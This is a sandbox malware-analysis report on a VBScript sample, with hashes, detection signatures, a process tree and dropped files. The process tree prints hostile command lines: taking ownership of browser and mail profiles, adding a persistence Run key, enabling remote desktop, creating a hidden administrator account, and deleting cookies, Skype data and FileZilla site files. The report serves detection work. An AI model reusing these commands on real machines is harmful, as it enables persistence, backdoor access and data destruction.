Analysis
-
max time kernel
22s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
19-10-2022 15:20
Static task
static1
Behavioral task
behavioral1
Sample
57a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b.vbs
Resource
win7-20220901-en
Behavioral task
behavioral2
Sample
57a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b.vbs
Resource
win10v2004-20220901-en
General
-
Target
57a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b.vbs
-
Size
181KB
-
MD5
91f6b90fc19be94b62bb3ec2ff60fc30
-
SHA1
ed92e88998bf8ed11994291fbdcdebf7272249fa
-
SHA256
57a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b
-
SHA512
ac874cbc96dcda332b4bc87b2bde9d81c67300e4aaa6315da45016ac5ff45c40505c98c44311f9ef8c1cbed11d58ac29e34b3d0652a19266348f6715ea8104fc
-
SSDEEP
1536:bTRRRRRRRRRRRRRRRRRRRRRRRVjxxxxxxxxxxxxxxxxx96df:bD6F
Malware Config
Signatures
-
Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
Processes:
WScript.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" WScript.exe -
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Adds policy Run key to start application 2 TTPs 4 IoCs
Processes:
WScript.exeSystemProtection.exedescription ioc process Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run WScript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Updates = "\"C:\\system32\\SystemProtection.exe\" /e:VBScript.Encode \"C:\\kernel\\r00t3r\"" WScript.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run SystemProtection.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Updates = "\"C:\\system32\\SystemProtection.exe\" /e:VBScript.Encode \"C:\\kernel\\r00t3r\"" SystemProtection.exe -
Disables RegEdit via registry modification 2 IoCs
Processes:
WScript.exeSystemProtection.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "0" WScript.exe Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "0" SystemProtection.exe -
Disables Task Manager via registry modification
-
Executes dropped EXE 1 IoCs
Processes:
SystemProtection.exepid process 4952 SystemProtection.exe -
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Possible privilege escalation attempt 26 IoCs
Processes:
takeown.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exepid process 3180 takeown.exe 3456 icacls.exe 3168 takeown.exe 1212 takeown.exe 3908 takeown.exe 3352 takeown.exe 508 takeown.exe 5104 takeown.exe 4232 takeown.exe 1496 takeown.exe 960 takeown.exe 2764 icacls.exe 4376 icacls.exe 1668 takeown.exe 4776 takeown.exe 208 takeown.exe 1384 takeown.exe 4868 takeown.exe 2572 takeown.exe 852 takeown.exe 1364 icacls.exe 1880 takeown.exe 4400 takeown.exe 1092 takeown.exe 400 takeown.exe 4960 takeown.exe -
Sets file to hidden 1 TTPs 3 IoCs
Modifies file attributes to stop it showing in Explorer etc.
Processes:
attrib.exeattrib.exeattrib.exepid process 5116 attrib.exe 4488 attrib.exe 4224 attrib.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exeWScript.exeWScript.exeSystemProtection.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation SystemProtection.exe -
Drops startup file 4 IoCs
Processes:
WScript.exeSystemProtection.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Media Player.vbe WScript.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Media Player.vbe WScript.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Media Player.vbe SystemProtection.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Media Player.vbe SystemProtection.exe -
Modifies file permissions 1 TTPs 26 IoCs
Processes:
takeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exepid process 1668 takeown.exe 2572 takeown.exe 3180 takeown.exe 4232 takeown.exe 1496 takeown.exe 4400 takeown.exe 4960 takeown.exe 4376 icacls.exe 1364 icacls.exe 1092 takeown.exe 3908 takeown.exe 1212 takeown.exe 1880 takeown.exe 960 takeown.exe 4868 takeown.exe 3456 icacls.exe 852 takeown.exe 2764 icacls.exe 3168 takeown.exe 3352 takeown.exe 4776 takeown.exe 208 takeown.exe 1384 takeown.exe 5104 takeown.exe 400 takeown.exe 508 takeown.exe -
Processes:
WScript.exeSystemProtection.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA WScript.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA SystemProtection.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry class 4 IoCs
Processes:
SystemProtection.exereg.exeWScript.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings SystemProtection.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\VBEFile\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\VBEFile\DefaultIcon\ = "C:\\Windows\\system32\\shell32.dll,1" reg.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings WScript.exe -
Runs net.exe
-
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
takeown.exetakeown.exevssvc.exedescription pid process Token: SeTakeOwnershipPrivilege 5104 takeown.exe Token: SeTakeOwnershipPrivilege 852 takeown.exe Token: SeBackupPrivilege 3540 vssvc.exe Token: SeRestorePrivilege 3540 vssvc.exe Token: SeAuditPrivilege 3540 vssvc.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
WScript.execmd.execmd.execmd.exedescription pid process target process PID 1884 wrote to memory of 1020 1884 WScript.exe cmd.exe PID 1884 wrote to memory of 1020 1884 WScript.exe cmd.exe PID 1020 wrote to memory of 4168 1020 cmd.exe mode.com PID 1020 wrote to memory of 4168 1020 cmd.exe mode.com PID 1020 wrote to memory of 4360 1020 cmd.exe cmd.exe PID 1020 wrote to memory of 4360 1020 cmd.exe cmd.exe PID 1020 wrote to memory of 4376 1020 cmd.exe find.exe PID 1020 wrote to memory of 4376 1020 cmd.exe find.exe PID 1020 wrote to memory of 2128 1020 cmd.exe cmd.exe PID 1020 wrote to memory of 2128 1020 cmd.exe cmd.exe PID 1020 wrote to memory of 4980 1020 cmd.exe find.exe PID 1020 wrote to memory of 4980 1020 cmd.exe find.exe PID 1884 wrote to memory of 1284 1884 WScript.exe cmd.exe PID 1884 wrote to memory of 1284 1884 WScript.exe cmd.exe PID 1284 wrote to memory of 2572 1284 cmd.exe takeown.exe PID 1284 wrote to memory of 2572 1284 cmd.exe takeown.exe PID 1884 wrote to memory of 236 1884 WScript.exe cmd.exe PID 1884 wrote to memory of 236 1884 WScript.exe cmd.exe PID 1284 wrote to memory of 208 1284 cmd.exe takeown.exe PID 1284 wrote to memory of 208 1284 cmd.exe takeown.exe PID 1284 wrote to memory of 4380 1284 cmd.exe cacls.exe PID 1284 wrote to memory of 4380 1284 cmd.exe cacls.exe PID 236 wrote to memory of 744 236 cmd.exe cmd.exe PID 236 wrote to memory of 744 236 cmd.exe cmd.exe PID 236 wrote to memory of 4588 236 cmd.exe reg.exe PID 236 wrote to memory of 4588 236 cmd.exe reg.exe PID 1284 wrote to memory of 3680 1284 cmd.exe cacls.exe PID 1284 wrote to memory of 3680 1284 cmd.exe cacls.exe PID 236 wrote to memory of 2148 236 cmd.exe xcopy.exe PID 236 wrote to memory of 2148 236 cmd.exe xcopy.exe PID 1284 wrote to memory of 3180 1284 cmd.exe takeown.exe PID 1284 wrote to memory of 3180 1284 cmd.exe takeown.exe PID 1284 wrote to memory of 4232 1284 cmd.exe takeown.exe PID 1284 wrote to memory of 4232 1284 cmd.exe takeown.exe PID 236 wrote to memory of 1876 236 cmd.exe xcopy.exe PID 236 wrote to memory of 1876 236 cmd.exe xcopy.exe PID 1284 wrote to memory of 1880 1284 cmd.exe takeown.exe PID 1284 wrote to memory of 1880 1284 cmd.exe takeown.exe PID 236 wrote to memory of 4852 236 cmd.exe xcopy.exe PID 236 wrote to memory of 4852 236 cmd.exe xcopy.exe PID 1284 wrote to memory of 1496 1284 cmd.exe takeown.exe PID 1284 wrote to memory of 1496 1284 cmd.exe takeown.exe PID 236 wrote to memory of 4240 236 cmd.exe attrib.exe PID 236 wrote to memory of 4240 236 cmd.exe attrib.exe PID 1284 wrote to memory of 1384 1284 cmd.exe takeown.exe PID 1284 wrote to memory of 1384 1284 cmd.exe takeown.exe PID 1284 wrote to memory of 960 1284 cmd.exe takeown.exe PID 1284 wrote to memory of 960 1284 cmd.exe takeown.exe PID 236 wrote to memory of 4224 236 cmd.exe attrib.exe PID 236 wrote to memory of 4224 236 cmd.exe attrib.exe PID 1284 wrote to memory of 4868 1284 cmd.exe takeown.exe PID 1284 wrote to memory of 4868 1284 cmd.exe takeown.exe PID 236 wrote to memory of 5116 236 cmd.exe attrib.exe PID 236 wrote to memory of 5116 236 cmd.exe attrib.exe PID 1284 wrote to memory of 5104 1284 cmd.exe takeown.exe PID 1284 wrote to memory of 5104 1284 cmd.exe takeown.exe PID 236 wrote to memory of 3720 236 cmd.exe xcopy.exe PID 236 wrote to memory of 3720 236 cmd.exe xcopy.exe PID 1284 wrote to memory of 3456 1284 cmd.exe icacls.exe PID 1284 wrote to memory of 3456 1284 cmd.exe icacls.exe PID 236 wrote to memory of 4180 236 cmd.exe xcopy.exe PID 236 wrote to memory of 4180 236 cmd.exe xcopy.exe PID 1284 wrote to memory of 852 1284 cmd.exe takeown.exe PID 1284 wrote to memory of 852 1284 cmd.exe takeown.exe -
System policy modification 1 TTPs 2 IoCs
Processes:
WScript.exedescription ioc process Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\sdate WScript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\sdate\sdate = "33" WScript.exe -
Views/modifies file attributes 1 TTPs 4 IoCs
Processes:
attrib.exeattrib.exeattrib.exeattrib.exepid process 4240 attrib.exe 4224 attrib.exe 5116 attrib.exe 4488 attrib.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\57a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b.vbs"1⤵
- Adds policy Run key to start application
- Disables RegEdit via registry modification
- Checks computer location settings
- Drops startup file
- Checks whether UAC is enabled
- Modifies registry class
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uac.bat" "2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\mode.commode con lines=1 cols=143⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ver "3⤵
-
C:\Windows\system32\find.exefind /i "version 6.1."3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ver "3⤵
-
C:\Windows\system32\find.exefind /i "version 6.0."3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /K takeown /F C:\kernel /A /R /D O & takeown /F C:\system32 /A /R /D O & CACLS C:\Kernel /E /T /C /G Admin:F & CACLS C:\system32 /E /T /C /G Admin:F & takeown /F "C:\Users\Admin\application data\Mozilla\Firefox\Profiles" /A /R /D O & takeown /F "C:\Users\Admin\application data\Google\Chrome\User Data" /A /R /D O & takeown /F "C:\Users\Admin\application data\Thunderbird\Profiles" /A /R /D O & takeown /F "C:\Users\Admin\application data\Skype" /A /R /D O & takeown /F "C:\Users\Admin\application data\FileZilla" /A /R /D O & takeown /F "%userproflie%\cookies" /A /R /D O & takeown /F "C:\Windows\system32\drivers" /A /R /D O & takeown /a /f C:\Windows\System32\wscript.exe & ICACLS C:\Windows\System32\wscript.exe /Grant Admin:F & takeown /a /f C:\Windows\System32\drivers\flpydisk.sys & ICACLS C:\Windows\System32\drivers\flpydisk.sys /Grant Admin:F & EXIT2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\takeown.exetakeown /F C:\kernel /A /R /D O3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /F C:\system32 /A /R /D O3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\cacls.exeCACLS C:\Kernel /E /T /C /G Admin:F3⤵
-
C:\Windows\system32\cacls.exeCACLS C:\system32 /E /T /C /G Admin:F3⤵
-
C:\Windows\system32\takeown.exetakeown /F "C:\Users\Admin\application data\Mozilla\Firefox\Profiles" /A /R /D O3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /F "C:\Users\Admin\application data\Google\Chrome\User Data" /A /R /D O3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /F "C:\Users\Admin\application data\Thunderbird\Profiles" /A /R /D O3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /F "C:\Users\Admin\application data\Skype" /A /R /D O3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /F "C:\Users\Admin\application data\FileZilla" /A /R /D O3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /F "%userproflie%\cookies" /A /R /D O3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /F "C:\Windows\system32\drivers" /A /R /D O3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /a /f C:\Windows\System32\wscript.exe3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeICACLS C:\Windows\System32\wscript.exe /Grant Admin:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /a /f C:\Windows\System32\drivers\flpydisk.sys3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeICACLS C:\Windows\System32\drivers\flpydisk.sys /Grant Admin:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp.bat" "2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c type "C:\system32\blood.dat"3⤵
-
C:\Windows\system32\reg.exereg add "HKCR\VBEFile\DefaultIcon" /v "" /t "REG_SZ" /d "C:\Windows\system32\shell32.dll,1" /f3⤵
- Modifies registry class
-
C:\Windows\system32\xcopy.exexcopy /C /H /Y /R "C:\kernel\*.vbe" "C:\Users\Admin\AppData\Local\Temp\"3⤵
-
C:\Windows\system32\xcopy.exexcopy /C /H /Y /R "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.vbe" "C:\Users\Admin\AppData\Local\Temp\"3⤵
-
C:\Windows\system32\xcopy.exexcopy /C /H /Y /R "C:\Users\Admin\AppData\Local\Temp\57a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b.vbs" "C:\Users\Admin\AppData\Local\Temp\"3⤵
-
C:\Windows\system32\attrib.exeattrib -s -h "C:\Users\Admin\AppData\Local\Temp\57a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b.vbs"3⤵
- Views/modifies file attributes
-
C:\Windows\system32\attrib.exeattrib +s +h "C:\system32"3⤵
- Sets file to hidden
- Views/modifies file attributes
-
C:\Windows\system32\attrib.exeattrib +s +h "C:\kernel"3⤵
- Sets file to hidden
- Views/modifies file attributes
-
C:\Windows\system32\xcopy.exexcopy /C /H /Y /R "C:\Users\Admin\AppData\Local\Temp\57a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b.vbs" "C:\system32\"3⤵
-
C:\Windows\system32\xcopy.exexcopy /C /H /Y /R "C:\Users\Admin\AppData\Local\Temp\57a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b.vbs" "C:\kernel\"3⤵
-
C:\Windows\system32\attrib.exeattrib +s +h "C:\kernel\r00t3r"3⤵
- Sets file to hidden
- Views/modifies file attributes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\tmp.vbe"2⤵
- Checks computer location settings
-
C:\system32\SystemProtection.exe"C:\system32\SystemProtection.exe" /e:VBScript.Encode "C:\system32\blood.dat2⤵
- Adds policy Run key to start application
- Disables RegEdit via registry modification
- Executes dropped EXE
- Checks computer location settings
- Drops startup file
- Checks whether UAC is enabled
- Modifies registry class
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uac.bat" "3⤵
-
C:\Windows\system32\mode.commode con lines=1 cols=144⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ver "4⤵
-
C:\Windows\system32\find.exefind /i "version 6.1."4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ver "4⤵
-
C:\Windows\system32\find.exefind /i "version 6.0."4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /K takeown /F C:\kernel /A /R /D O & takeown /F C:\system32 /A /R /D O & CACLS C:\Kernel /E /T /C /G Admin:F & CACLS C:\system32 /E /T /C /G Admin:F & takeown /F "C:\Users\Admin\application data\Mozilla\Firefox\Profiles" /A /R /D O & takeown /F "C:\Users\Admin\application data\Google\Chrome\User Data" /A /R /D O & takeown /F "C:\Users\Admin\application data\Thunderbird\Profiles" /A /R /D O & takeown /F "C:\Users\Admin\application data\Skype" /A /R /D O & takeown /F "C:\Users\Admin\application data\FileZilla" /A /R /D O & takeown /F "%userproflie%\cookies" /A /R /D O & takeown /F "C:\Windows\system32\drivers" /A /R /D O & takeown /a /f C:\Windows\System32\wscript.exe & ICACLS C:\Windows\System32\wscript.exe /Grant Admin:F & takeown /a /f C:\Windows\System32\drivers\flpydisk.sys & ICACLS C:\Windows\System32\drivers\flpydisk.sys /Grant Admin:F & EXIT3⤵
-
C:\Windows\system32\takeown.exetakeown /F C:\kernel /A /R /D O4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /F C:\system32 /A /R /D O4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\cacls.exeCACLS C:\Kernel /E /T /C /G Admin:F4⤵
-
C:\Windows\system32\cacls.exeCACLS C:\system32 /E /T /C /G Admin:F4⤵
-
C:\Windows\system32\takeown.exetakeown /F "C:\Users\Admin\application data\Mozilla\Firefox\Profiles" /A /R /D O4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /F "C:\Users\Admin\application data\Thunderbird\Profiles" /A /R /D O4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /F "C:\Users\Admin\application data\Google\Chrome\User Data" /A /R /D O4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /F "C:\Users\Admin\application data\Skype" /A /R /D O4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /F "C:\Users\Admin\application data\FileZilla" /A /R /D O4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /F "%userproflie%\cookies" /A /R /D O4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /F "C:\Windows\system32\drivers" /A /R /D O4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /a /f C:\Windows\System32\wscript.exe4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeICACLS C:\Windows\System32\wscript.exe /Grant Admin:F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /a /f C:\Windows\System32\drivers\flpydisk.sys4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeICACLS C:\Windows\System32\drivers\flpydisk.sys /Grant Admin:F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp.bat" "3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c type "C:\system32\blood.dat"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\tmp.vbe"3⤵
- Checks computer location settings
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\sdf.vbs"3⤵
- Modifies visiblity of hidden/system files in Explorer
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\system32\bkr.bat" "3⤵
-
C:\Windows\system32\netsh.exenetsh firewall set service type=remotedesktop mode=enable scope=all4⤵
- Modifies Windows Firewall
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f4⤵
-
C:\Windows\system32\net.exenet user timalin /delete4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user timalin /delete5⤵
-
C:\Windows\system32\net.exenet user NTUSER /delete4⤵
-
C:\Windows\system32\net.exenet user /add HelpAssistant jevoussalue4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user /add HelpAssistant jevoussalue5⤵
-
C:\Windows\system32\net.exenet localgroup Administrators /add NTUSER4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators /add NTUSER5⤵
-
C:\Windows\system32\net.exenet localgroup Administrateurs /add NTUSER4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrateurs /add NTUSER5⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v HelpAssistant /t REG_DWORD /d 0 /f4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /K cd/d "C:\Users\Admin" & rd/q/s Windows & rd/q/s s4t4n & rd/q/s Microsoft & rd/q/s Securities & cd/d C:\Windows\system32\drivers & ren flpydisk.sys flpydisk.sy_ & del/f/q/a C:\system\*.* & EXIT3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /K CD/D "C:\Users\Admin\COOKIES" & Del/f/q/a *.* & EXIT3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /K cd/d "C:\Users\Admin\Application Data\Skype" & rd/s/q "C:\Users\Admin\Application Data\Skype" & EXIT3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /K cd/d "C:\Users\Admin\AppData\Roaming\opera" & del/f/q opera & EXIT3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /K cd/d "C:\Users\Admin\AppData\Roaming\FileZilla" & del/f/q sitemanager.xml & EXIT3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /K cd/d "C:\system32" & echo done >>"C:\system32\r0k.rk" & EXIT2⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user NTUSER /delete1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\sdf.vbsFilesize
327B
MD5031c3f01fd6505397cae931dbdf3bfdb
SHA1d20fdee4d60f60b957ccf742130ba56485eae8c6
SHA256b0603aa4a03646b48636653a8f950cf996ef351ff9f909b244b6b79ba15aa63a
SHA512d1c5394d41782b1a896e7a6c63e7ebf5f72c27b2bc7efb4fbe393052374e7939ad2ad3a5d4422b42547d06bb4a955b47591cd5458f3d64e9b2c5614e62132457
-
C:\Users\Admin\AppData\Local\Temp\tmp.batFilesize
1KB
MD545b08f10911ca031d2b3682a109d64d8
SHA170c69c39ee4dff16594d61e43abd0ae9cba024f4
SHA256db4b9ec1266f1088f610d217d6503aeb2b4b88dfc98b831b257bf1208add5b20
SHA5121d98beca47ca7c7cf2de6e09545bdffb608228cbd1d845a61779fb8665a987f28bd848b3363530215860eb0a6ed0078ebdd88efdf63ac140b5988a621692fb53
-
C:\Users\Admin\AppData\Local\Temp\tmp.batFilesize
1KB
MD5659ce8e39a97c207cb7b7772fac6bbbe
SHA1482911c7f725ee815c5cf1a52ff65809be1d83ff
SHA256620daa8294456838bb9323383424bf704bbadbaaa0890ce96cf04d017925e47a
SHA512eb436ee66ef4f36ecc5664dcb5268b6430cd12c085208d84b43fded8a65658c7c305a1109dfd45341c677c892553ca668596267ab916f432ec80ac7bd82dad47
-
C:\Users\Admin\AppData\Local\Temp\tmp.vbeFilesize
2KB
MD5b4725c8a0d996c389273664a63759590
SHA1219ae39177633b65c451d07fb2fe2ff739811032
SHA2568c2a55ce18955ae8db8d6640c819c3efaa1a2da1150d2a56b24189a09459bcce
SHA512b832de92b3fe9fa0c196ba07862c1222812d289f33dcaffac5832f05e908f5c51cb9490bee5ca9bb31ea3beb76f64ebb5c150ecceedb155bd39495ec88ae190f
-
C:\Users\Admin\AppData\Local\Temp\tmp.vbeFilesize
2KB
MD5b4725c8a0d996c389273664a63759590
SHA1219ae39177633b65c451d07fb2fe2ff739811032
SHA2568c2a55ce18955ae8db8d6640c819c3efaa1a2da1150d2a56b24189a09459bcce
SHA512b832de92b3fe9fa0c196ba07862c1222812d289f33dcaffac5832f05e908f5c51cb9490bee5ca9bb31ea3beb76f64ebb5c150ecceedb155bd39495ec88ae190f
-
C:\Users\Admin\AppData\Local\Temp\uac.batFilesize
1KB
MD5e2930c13dcc510ff3e677f744c13fcf2
SHA1d1bdcd06108a6bf848cf72181003ea587d1fbdb1
SHA256a4bd0e5e41f1ecfb8db11c8a217508d47b35f665bcf255bd6bc101838eb61f1e
SHA5126a63a344d8f94e800c6cacf0c3927d006e3eff380a001b32abfa2e8cbab5ea923ba52748945de9b18bc84af11f7753a2c86c880dd0c885e3fbfe392e37b43721
-
C:\Users\Admin\AppData\Local\Temp\uac.batFilesize
1KB
MD5e2930c13dcc510ff3e677f744c13fcf2
SHA1d1bdcd06108a6bf848cf72181003ea587d1fbdb1
SHA256a4bd0e5e41f1ecfb8db11c8a217508d47b35f665bcf255bd6bc101838eb61f1e
SHA5126a63a344d8f94e800c6cacf0c3927d006e3eff380a001b32abfa2e8cbab5ea923ba52748945de9b18bc84af11f7753a2c86c880dd0c885e3fbfe392e37b43721
-
C:\kernel\57a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b.vbsFilesize
181KB
MD591f6b90fc19be94b62bb3ec2ff60fc30
SHA1ed92e88998bf8ed11994291fbdcdebf7272249fa
SHA25657a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b
